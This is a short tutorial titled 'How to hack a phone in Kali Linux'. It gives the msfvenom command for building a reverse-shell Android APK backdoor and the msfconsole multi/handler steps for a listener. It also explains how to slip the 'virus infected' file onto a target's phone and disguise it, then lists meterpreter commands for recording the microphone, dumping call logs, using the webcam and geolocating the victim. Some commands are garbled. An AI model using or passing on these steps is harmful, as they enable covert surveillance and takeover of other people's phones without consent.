HOW TO HACK A PHONE ? IN KALI LINUX

 

Launching an Android Metasploit

The following steps will demonstrate how to download MSFVenom on a Kali Linux system.

Start the terminal and enter the following command.

msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk

Here, the payload is launched using an Exploit extension calleed “Meterpreter”.

To determine the IP address of the listener host, open a new console terminal and enter ifconfig. Usually, port 4444 is assigned for trojans, exploits, and viruses.

Once the IP address has been determined, go back to the previous screen and enter the details.

The file “hackand.apk” will be saved in the desktop and is the main backdoor exploit to be used on the Android phone.

In the next step, launch “msfconsole” which is a common penetration testing tool used with Kali Linux. For this, enter service postgresql start followed by msfconsole. PostgreSQL refers to a database where the console has been stored.

Once the penetration tool is ready, you can launch the remaining exploit.

Next, an executable called “multi-handler” will be used.

use multi/handler

Refer to the image below for connecting the exploit with the console. The same IP address and port numbers will be used.

In the next stage, the msfvenom exploit will be launched and initialized with a simple exploit command. Now, we have to find a target which will be an Android phone.

Connecting Kali Linux Terminal with Android Phone

The hackand.apk file which we downloaded earlier is only 10 KB in size. You will have to find a way to insert the file in the target’s phone. You can transfer the virus using USB or a temporary email service.

Generally, webmail providers such as Gmail or Yahoo will refuse to carry this virus infected file.

Android will warn you before you insert the software. But, it just takes less than 20 seconds to complete the installation as you only have to “ignore the risk and install.” This makes the threat somewhat serious if your phone is in unlock mode.

As shown here, a lot of damage can be done to the phone including modifying the storage contents, preventing phone from sleep, connecting and disconnecting from Wi-Fi, setting wallpaper, and more.

Once the APK file is installed, it can be cleverly disguised within the phone.

Now, you can use many commands like the following on Kali Linux terminal to control the phone. You don’t have to remember them really as the list is available from a simple help option in meterpreter.

• record_mic: recording the microphone
• dump calllog: get the call log
• webcam_chat: start a video chat
• geolocate: get the phone’s current location